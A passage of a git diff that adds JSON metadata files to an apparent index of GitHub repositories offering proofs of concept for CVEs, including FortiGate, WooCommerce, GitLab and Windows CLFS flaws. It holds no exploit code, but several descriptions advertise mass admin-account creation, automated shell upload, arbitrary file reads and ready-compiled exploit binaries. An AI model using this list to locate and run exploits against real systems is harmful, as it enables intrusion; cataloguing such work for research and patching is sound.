"https:\/\/avatars.githubusercontent.com\/u\/127108998?v=4", + "html_url": "https:\/\/github.com\/delsploit", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/delsploit\/CVE-2023-27997", + "description": null, + "fork": false, + "created_at": "2023-10-12T17:50:38Z", + "updated_at": "2024-03-01T09:02:02Z", + "pushed_at": "2023-10-12T18:13:23Z", + "stargazers_count": 9, + "watchers_count": 9, + "has_discussions": false, + "forks_count": 1, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 1, + "watchers": 9, + "score": 0, + "subscribers_count": 2 + }, + { + "id": 888520597, + "name": "CVE-2023-27997-POC", + "full_name": "node011\/CVE-2023-27997-POC", + "owner": { + "login": "node011", + "id": 124257857, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/124257857?v=4", + "html_url": "https:\/\/github.com\/node011", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/node011\/CVE-2023-27997-POC", + "description": "Fortigate SSL VPN buffer overflow exploit", + "fork": false, + "created_at": "2024-11-14T14:41:20Z", + "updated_at": "2024-11-14T15:08:40Z", + "pushed_at": "2024-11-14T15:08:36Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2023/CVE-2023-28121.json b/2023/CVE-2023-28121.json new file mode 100644 index 0000000000..9fb3bf6cd0 --- /dev/null +++ b/2023/CVE-2023-28121.json @@ -0,0 +1,204 @@ +[ + { + "id": 621569715, + "name": "CVE-2023-28121", + "full_name": "gbrsh\/CVE-2023-28121", + "owner": { + "login": "gbrsh", + "id": 36970331, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/36970331?v=4", + "html_url": "https:\/\/github.com\/gbrsh", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/gbrsh\/CVE-2023-28121", + "description": "WooCommerce Payments: Unauthorized Admin Access Exploit", + "fork": false, + "created_at": "2023-03-30T23:50:39Z", + "updated_at": "2024-05-15T06:21:35Z", + "pushed_at": "2023-05-31T13:21:43Z", + "stargazers_count": 39, + "watchers_count": 39, + "has_discussions": false, + "forks_count": 14, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 14, + "watchers": 39, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 665349664, + "name": "Mass-CVE-2023-28121", + "full_name": "im-hanzou\/Mass-CVE-2023-28121", + "owner": { + "login": "im-hanzou", + "id": 61415393, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/61415393?v=4", + "html_url": "https:\/\/github.com\/im-hanzou", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/im-hanzou\/Mass-CVE-2023-28121", + "description": "CVE-2023-28121 - WooCommerce Payments < 5.6.2 - Unauthenticated Privilege Escalation [ Mass Add Admin User ] ", + "fork": false, + "created_at": "2023-07-12T02:41:26Z", + "updated_at": "2024-11-07T18:03:29Z", + "pushed_at": "2023-07-14T21:47:59Z", + "stargazers_count": 12, + "watchers_count": 12, + "has_discussions": false, + "forks_count": 3, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [ + "cve-2023-28121", + "exploit", + "mass", + "python", + "woocommerce", + "woocommerce-payment", + "wordpresss" + ], + "visibility": "public", + "forks": 3, + "watchers": 12, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 665401623, + "name": "Mass-CVE-2023-28121-kdoec", + "full_name": "rio128128\/Mass-CVE-2023-28121-kdoec", + "owner": { + "login": "rio128128", + "id": 136775778, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/136775778?v=4", + "html_url": "https:\/\/github.com\/rio128128", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/rio128128\/Mass-CVE-2023-28121-kdoec", + "description": "CVE-2023-28121 - WooCommerce Payments < 5.6.2 - Unauthenticated Privilege Escalation [ Mass Add Admin User ]", + "fork": false, + "created_at": "2023-07-12T06:04:56Z", + "updated_at": "2023-07-12T07:15:07Z", + "pushed_at": "2023-07-12T06:23:54Z", + "stargazers_count": 1, + "watchers_count": 1, + "has_discussions": false, + "forks_count": 1, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 1, + "watchers": 1, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 669932793, + "name": "CVE-2023-28121", + "full_name": "C04LA\/CVE-2023-28121", + "owner": { + "login": "C04LA", + "id": 21272230, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/21272230?v=4", + "html_url": "https:\/\/github.com\/C04LA", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/C04LA\/CVE-2023-28121", + "description": null, + "fork": false, + "created_at": "2023-07-23T22:38:39Z", + "updated_at": "2023-07-23T22:38:39Z", + "pushed_at": "2023-07-23T22:38:39Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 713660150, + "name": "WP-CVE-2023-28121", + "full_name": "Jenderal92\/WP-CVE-2023-28121", + "owner": { + "login": "Jenderal92", + "id": 59664965, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/59664965?v=4", + "html_url": "https:\/\/github.com\/Jenderal92", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/Jenderal92\/WP-CVE-2023-28121", + "description": "Wordpress CVE-2023-28121", + "fork": false, + "created_at": "2023-11-03T01:19:09Z", + "updated_at": "2024-12-07T21:27:58Z", + "pushed_at": "2024-11-17T23:45:17Z", + "stargazers_count": 1, + "watchers_count": 1, + "has_discussions": false, + "forks_count": 3, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [ + "bot-auto-scanner-vuln", + "bot-auto-upload-shell", + "cve-2023-28121", + "cve-wordpress", + "exploit", + "vulnerability", + "wordpress" + ], + "visibility": "public", + "forks": 3, + "watchers": 1, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 714083360, + "name": "CVE-2023-28121", + "full_name": "1337nemojj\/CVE-2023-28121", + "owner": { + "login": "1337nemojj", + "id": 36542035, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/36542035?v=4", + "html_url": "https:\/\/github.com\/1337nemojj", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/1337nemojj\/CVE-2023-28121", + "description": null, + "fork": false, + "created_at": "2023-11-03T22:02:11Z", + "updated_at": "2023-11-03T22:07:39Z", + "pushed_at": "2023-11-15T11:47:39Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2023/CVE-2023-28197.json b/2023/CVE-2023-28197.json new file mode 100644 index 0000000000..da09576db0 --- /dev/null +++ b/2023/CVE-2023-28197.json @@ -0,0 +1,33 @@ +[ + { + "id": 730398815, + "name": "inputcontrol", + "full_name": "spotlightishere\/inputcontrol", + "owner": { + "login": "spotlightishere", + "id": 10055256, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/10055256?v=4", + "html_url": "https:\/\/github.com\/spotlightishere", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/spotlightishere\/inputcontrol", + "description": "proof-of-concept for CVE-2023-28197", + "fork": false, + "created_at": "2023-12-11T20:55:21Z", + "updated_at": "2024-12-27T09:52:42Z", + "pushed_at": "2023-12-11T20:56:07Z", + "stargazers_count": 4, + "watchers_count": 4, + "has_discussions": false, + "forks_count": 1, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 1, + "watchers": 4, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2023/CVE-2023-28205.json b/2023/CVE-2023-28205.json new file mode 100644 index 0000000000..fa40f5b868 --- /dev/null +++ b/2023/CVE-2023-28205.json @@ -0,0 +1,42 @@ +[ + { + "id": 896459919, + "name": "uaf-2023-28205", + "full_name": "ntfargo\/uaf-2023-28205", + "owner": { + "login": "ntfargo", + "id": 32229490, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/32229490?v=4", + "html_url": "https:\/\/github.com\/ntfargo", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/ntfargo\/uaf-2023-28205", + "description": "PoC CVE-2023-28205: Apple WebKit Use-After-Free Vulnerability", + "fork": false, + "created_at": "2024-11-30T12:25:47Z", + "updated_at": "2024-12-28T18:56:19Z", + "pushed_at": "2024-12-01T16:08:19Z", + "stargazers_count": 10, + "watchers_count": 10, + "has_discussions": false, + "forks_count": 2, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [ + "apple", + "playstation", + "poc", + "ps4", + "ps5", + "use-after-free", + "vulnerability", + "webkit" + ], + "visibility": "public", + "forks": 2, + "watchers": 10, + "score": 0, + "subscribers_count": 2 + } +] \ No newline at end of file diff --git a/2023/CVE-2023-28206.json b/2023/CVE-2023-28206.json new file mode 100644 index 0000000000..04eaa9d823 --- /dev/null +++ b/2023/CVE-2023-28206.json @@ -0,0 +1,33 @@ +[ + { + "id": 640980356, + "name": "acceleratortroll", + "full_name": "acceleratortroll\/acceleratortroll", + "owner": { + "login": "acceleratortroll", + "id": 133675032, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/133675032?v=4", + "html_url": "https:\/\/github.com\/acceleratortroll", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/acceleratortroll\/acceleratortroll", + "description": "Abusing CVE-2023-28206 to make something useful", + "fork": false, + "created_at": "2023-05-15T14:22:12Z", + "updated_at": "2024-12-02T04:38:55Z", + "pushed_at": "2023-05-17T17:39:26Z", + "stargazers_count": 8, + "watchers_count": 8, + "has_discussions": false, + "forks_count": 3, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 3, + "watchers": 8, + "score": 0, + "subscribers_count": 3 + } +] \ No newline at end of file diff --git a/2023/CVE-2023-28218.json b/2023/CVE-2023-28218.json new file mode 100644 index 0000000000..16e7cc332f --- /dev/null +++ b/2023/CVE-2023-28218.json @@ -0,0 +1,33 @@ +[ + { + "id": 648327862, + "name": "CVE-2023-28218", + "full_name": "h1bAna\/CVE-2023-28218", + "owner": { + "login": "h1bAna", + "id": 70074237, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/70074237?v=4", + "html_url": "https:\/\/github.com\/h1bAna", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/h1bAna\/CVE-2023-28218", + "description": null, + "fork": false, + "created_at": "2023-06-01T18:04:32Z", + "updated_at": "2024-02-25T18:56:02Z", + "pushed_at": "2023-06-01T18:10:10Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 1, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 1, + "watchers": 0, + "score": 0, + "subscribers_count": 2 + } +] \ No newline at end of file diff --git a/2023/CVE-2023-2822.json b/2023/CVE-2023-2822.json new file mode 100644 index 0000000000..79665d86bb --- /dev/null +++ b/2023/CVE-2023-2822.json @@ -0,0 +1,33 @@ +[ + { + "id": 643696394, + "name": "CVE-2023-2822-demo", + "full_name": "cberman\/CVE-2023-2822-demo", + "owner": { + "login": "cberman", + "id": 832957, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/832957?v=4", + "html_url": "https:\/\/github.com\/cberman", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/cberman\/CVE-2023-2822-demo", + "description": "Simple flask application to implement an intentionally vulnerable web app to demo CVE-2023-2822.", + "fork": false, + "created_at": "2023-05-22T00:46:24Z", + "updated_at": "2023-05-27T20:41:23Z", + "pushed_at": "2023-05-27T20:41:11Z", + "stargazers_count": 3, + "watchers_count": 3, + "has_discussions": false, + "forks_count": 2, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 2, + "watchers": 3, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2023/CVE-2023-28229.json b/2023/CVE-2023-28229.json new file mode 100644 index 0000000000..a9fbddebdd --- /dev/null +++ b/2023/CVE-2023-28229.json @@ -0,0 +1,64 @@ +[ + { + "id": 686907418, + "name": "CVE-2023-28229", + "full_name": "Y3A\/CVE-2023-28229", + "owner": { + "login": "Y3A", + "id": 62646606, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/62646606?v=4", + "html_url": "https:\/\/github.com\/Y3A", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/Y3A\/CVE-2023-28229", + "description": null, + "fork": false, + "created_at": "2023-09-04T07:48:13Z", + "updated_at": "2024-11-15T16:50:23Z", + "pushed_at": "2024-01-08T03:34:51Z", + "stargazers_count": 130, + "watchers_count": 130, + "has_discussions": false, + "forks_count": 33, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 33, + "watchers": 130, + "score": 0, + "subscribers_count": 2 + }, + { + "id": 778505062, + "name": "CrackKeyIso", + "full_name": "byt3n33dl3\/CrackKeyIso", + "owner": { + "login": "byt3n33dl3", + "id": 151133481, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/151133481?v=4", + "html_url": "https:\/\/github.com\/byt3n33dl3", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/byt3n33dl3\/CrackKeyIso", + "description": "it's a CVE-2023-28229 (Patched), but feel free to use it for check any outdated software or reseach", + "fork": false, + "created_at": "2024-03-27T20:57:46Z", + "updated_at": "2024-11-17T16:51:16Z", + "pushed_at": "2024-07-08T16:04:59Z", + "stargazers_count": 6, + "watchers_count": 6, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 6, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2023/CVE-2023-28231.json b/2023/CVE-2023-28231.json new file mode 100644 index 0000000000..eac29fc3e5 --- /dev/null +++ b/2023/CVE-2023-28231.json @@ -0,0 +1,33 @@ +[ + { + "id": 636872469, + "name": "CVE-2023-28231", + "full_name": "TheHermione\/CVE-2023-28231", + "owner": { + "login": "TheHermione", + "id": 73027590, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/73027590?v=4", + "html_url": "https:\/\/github.com\/TheHermione", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/TheHermione\/CVE-2023-28231", + "description": "DHCP Server Remote Code Execution impact: 2008 R2 SP1 до Server 2019", + "fork": false, + "created_at": "2023-05-05T21:13:13Z", + "updated_at": "2024-12-06T23:56:57Z", + "pushed_at": "2023-05-05T21:15:24Z", + "stargazers_count": 70, + "watchers_count": 70, + "has_discussions": false, + "forks_count": 13, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 13, + "watchers": 70, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2023/CVE-2023-28244.json b/2023/CVE-2023-28244.json new file mode 100644 index 0000000000..de6b4e7987 --- /dev/null +++ b/2023/CVE-2023-28244.json @@ -0,0 +1,33 @@ +[ + { + "id": 647848616, + "name": "cve-2023-28244", + "full_name": "sk3w\/cve-2023-28244", + "owner": { + "login": "sk3w", + "id": 1188891, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/1188891?v=4", + "html_url": "https:\/\/github.com\/sk3w", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/sk3w\/cve-2023-28244", + "description": null, + "fork": false, + "created_at": "2023-05-31T16:43:34Z", + "updated_at": "2023-09-24T13:57:04Z", + "pushed_at": "2023-05-31T16:50:31Z", + "stargazers_count": 2, + "watchers_count": 2, + "has_discussions": false, + "forks_count": 1, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 1, + "watchers": 2, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2023/CVE-2023-2825.json b/2023/CVE-2023-2825.json new file mode 100644 index 0000000000..e459e421b6 --- /dev/null +++ b/2023/CVE-2023-2825.json @@ -0,0 +1,222 @@ +[ + { + "id": 645357440, + "name": "CVE-2023-2825", + "full_name": "Occamsec\/CVE-2023-2825", + "owner": { + "login": "Occamsec", + "id": 55592824, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/55592824?v=4", + "html_url": "https:\/\/github.com\/Occamsec", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/Occamsec\/CVE-2023-2825", + "description": "GitLab CVE-2023-2825 PoC. This PoC leverages a path traversal vulnerability to retrieve the \/etc\/passwd file from a system running GitLab 16.0.0.", + "fork": false, + "created_at": "2023-05-25T13:25:10Z", + "updated_at": "2024-09-14T08:09:37Z", + "pushed_at": "2023-06-02T12:10:06Z", + "stargazers_count": 142, + "watchers_count": 142, + "has_discussions": false, + "forks_count": 32, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [ + "cve-2023-2825", + "gitlab" + ], + "visibility": "public", + "forks": 32, + "watchers": 142, + "score": 0, + "subscribers_count": 4 + }, + { + "id": 646319872, + "name": "CVE-2023-2825", + "full_name": "yuimarudev\/CVE-2023-2825", + "owner": { + "login": "yuimarudev", + "id": 68449029, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/68449029?v=4", + "html_url": "https:\/\/github.com\/yuimarudev", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/yuimarudev\/CVE-2023-2825", + "description": "CVE-2023-2825 list", + "fork": false, + "created_at": "2023-05-28T02:14:37Z", + "updated_at": "2023-05-28T02:14:37Z", + "pushed_at": "2023-05-28T02:14:37Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 647150606, + "name": "CVE-2023-2825-Gitlab", + "full_name": "Tornad0007\/CVE-2023-2825-Gitlab", + "owner": { + "login": "Tornad0007", + "id": 93181695, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/93181695?v=4", + "html_url": "https:\/\/github.com\/Tornad0007", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/Tornad0007\/CVE-2023-2825-Gitlab", + "description": "the proof of concept written in Python for an unauthenticated malicious user can use a path traversal vulnerability to read arbitrary files on the server when an attachment exists in a public project nested within at least five groups. This is a critical severity issue ", + "fork": false, + "created_at": "2023-05-30T07:03:19Z", + "updated_at": "2023-05-30T07:05:44Z", + "pushed_at": "2023-05-30T07:05:39Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 1, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 1, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 649827572, + "name": "CVE-2023-2825", + "full_name": "Rubikcuv5\/CVE-2023-2825", + "owner": { + "login": "Rubikcuv5", + "id": 47946047, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/47946047?v=4", + "html_url": "https:\/\/github.com\/Rubikcuv5", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/Rubikcuv5\/CVE-2023-2825", + "description": "On May 23, 2023 GitLab released version 16.0.1 which fixed a critical vulnerability, CVE-2023-2825, affecting the Community Edition (CE) and Enterprise Edition (EE) version 16.0.0. The vulnerability allows unauthenticated users to read arbitrary files through a path traversal bug.", + "fork": false, + "created_at": "2023-06-05T18:16:51Z", + "updated_at": "2023-06-19T21:41:12Z", + "pushed_at": "2023-06-17T01:22:26Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 1, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 1, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 689671335, + "name": "CVE-2023-2825", + "full_name": "caopengyan\/CVE-2023-2825", + "owner": { + "login": "caopengyan", + "id": 87455626, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/87455626?v=4", + "html_url": "https:\/\/github.com\/caopengyan", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/caopengyan\/CVE-2023-2825", + "description": null, + "fork": false, + "created_at": "2023-09-10T14:51:30Z", + "updated_at": "2023-09-10T14:52:52Z", + "pushed_at": "2023-09-10T15:36:23Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 817964661, + "name": "CVE-2023-2825", + "full_name": "cc3305\/CVE-2023-2825", + "owner": { + "login": "cc3305", + "id": 103961201, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/103961201?v=4", + "html_url": "https:\/\/github.com\/cc3305", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/cc3305\/CVE-2023-2825", + "description": "CVE-2023-2825 exploit script", + "fork": false, + "created_at": "2024-06-20T20:22:01Z", + "updated_at": "2024-07-27T20:19:49Z", + "pushed_at": "2024-07-27T20:19:46Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 911267135, + "name": "MassCyberCenter-Mentorship-Project-", + "full_name": "alej6\/MassCyberCenter-Mentorship-Project-", + "owner": { + "login": "alej6", + "id": 157525975, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/157525975?v=4", + "html_url": "https:\/\/github.com\/alej6", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/alej6\/MassCyberCenter-Mentorship-Project-", + "description": "Exploiting CVE-2023-2825 on a VM", + "fork": false, + "created_at": "2025-01-02T16:10:01Z", + "updated_at": "2025-01-07T23:50:33Z", + "pushed_at": "2025-01-07T23:50:29Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 0 + } +] \ No newline at end of file diff --git a/2023/CVE-2023-28252.json b/2023/CVE-2023-28252.json new file mode 100644 index 0000000000..5f656b88e6 --- /dev/null +++ b/2023/CVE-2023-28252.json @@ -0,0 +1,219 @@ +[ + { + "id": 659242316, + "name": "CVE-2023-28252", + "full_name": "fortra\/CVE-2023-28252", + "owner": { + "login": "fortra", + "id": 117669217, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/117669217?v=4", + "html_url": "https:\/\/github.com\/fortra", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/fortra\/CVE-2023-28252", + "description": null, + "fork": false, + "created_at": "2023-06-27T12:22:05Z", + "updated_at": "2025-01-02T23:06:20Z", + "pushed_at": "2023-07-10T16:57:44Z", + "stargazers_count": 173, + "watchers_count": 173, + "has_discussions": false, + "forks_count": 47, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 47, + "watchers": 173, + "score": 0, + "subscribers_count": 2 + }, + { + "id": 673742042, + "name": "CVE-2023-28252", + "full_name": "726232111\/CVE-2023-28252", + "owner": { + "login": "726232111", + "id": 34729943, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/34729943?v=4", + "html_url": "https:\/\/github.com\/726232111", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/726232111\/CVE-2023-28252", + "description": null, + "fork": false, + "created_at": "2023-08-02T10:14:40Z", + "updated_at": "2023-11-24T02:55:08Z", + "pushed_at": "2023-08-02T10:16:26Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 718019226, + "name": "CVE-2023-28252-", + "full_name": "Danasuley\/CVE-2023-28252-", + "owner": { + "login": "Danasuley", + "id": 148750257, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/148750257?v=4", + "html_url": "https:\/\/github.com\/Danasuley", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/Danasuley\/CVE-2023-28252-", + "description": "Обнаружение эксплойта CVE-2023-28252 ", + "fork": false, + "created_at": "2023-11-13T07:46:38Z", + "updated_at": "2023-11-13T07:46:39Z", + "pushed_at": "2023-11-13T07:55:22Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 737810016, + "name": "Compiled-PoC-Binary-For-CVE-2023-28252", + "full_name": "bkstephen\/Compiled-PoC-Binary-For-CVE-2023-28252", + "owner": { + "login": "bkstephen", + "id": 8013595, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/8013595?v=4", + "html_url": "https:\/\/github.com\/bkstephen", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/bkstephen\/Compiled-PoC-Binary-For-CVE-2023-28252", + "description": "The repo contains a precompiled binary which can be run on a Windows machine vulnerable to CVE-2023-28252", + "fork": false, + "created_at": "2024-01-01T15:30:33Z", + "updated_at": "2024-06-21T07:22:21Z", + "pushed_at": "2024-01-01T15:39:15Z", + "stargazers_count": 3, + "watchers_count": 3, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 3, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 746601760, + "name": "CVE-2023-28252-Compiled-exe", + "full_name": "duck-sec\/CVE-2023-28252-Compiled-exe", + "owner": { + "login": "duck-sec", + "id": 129839654, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/129839654?v=4", + "html_url": "https:\/\/github.com\/duck-sec", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/duck-sec\/CVE-2023-28252-Compiled-exe", + "description": "A modification to fortra's CVE-2023-28252 exploit, compiled to exe", + "fork": false, + "created_at": "2024-01-22T10:38:02Z", + "updated_at": "2025-01-02T22:31:57Z", + "pushed_at": "2024-01-24T13:45:56Z", + "stargazers_count": 53, + "watchers_count": 53, + "has_discussions": false, + "forks_count": 11, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 11, + "watchers": 53, + "score": 0, + "subscribers_count": 2 + }, + { + "id": 775566247, + "name": "CLFS", + "full_name": "byt3n33dl3\/CLFS", + "owner": { + "login": "byt3n33dl3", + "id": 151133481, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/151133481?v=4", + "html_url": "https:\/\/github.com\/byt3n33dl3", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/byt3n33dl3\/CLFS", + "description": "it's a CVE-2023-28252 (Patched), but feel free to use it for check any outdated software or reseach", + "fork": false, + "created_at": "2024-03-21T16:16:52Z", + "updated_at": "2024-11-17T16:50:38Z", + "pushed_at": "2024-07-09T03:43:41Z", + "stargazers_count": 7, + "watchers_count": 7, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 7, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 815887734, + "name": "CVE-2023-28252", + "full_name": "Vulmatch\/CVE-2023-28252", + "owner": { + "login": "Vulmatch", + "id": 70934566, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/70934566?v=4", + "html_url": "https:\/\/github.com\/Vulmatch", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/Vulmatch\/CVE-2023-28252", + "description": "The TL;DR for the learnings of Windows Vulnerability CVE-2023-28252", + "fork": false, + "created_at": "2024-06-16T12:35:57Z", + "updated_at": "2024-06-16T13:06:54Z", + "pushed_at": "2024-06-16T13:06:50Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2023/CVE-2023-28293.json b/2023/CVE-2023-28293.json new file mode 100644 index 0000000000..627f92b7c0 --- /dev/null +++ b/2023/CVE-2023-28293.json @@ -0,0 +1,33 @@ +[ + { + "id": 907323398, + "name": "CVE-2023-28293", + "full_name": "CrazyDaveX86\/CVE-2023-28293", + "owner": { + "login": "CrazyDaveX86", + "id": 192593040, + "avatar_url": 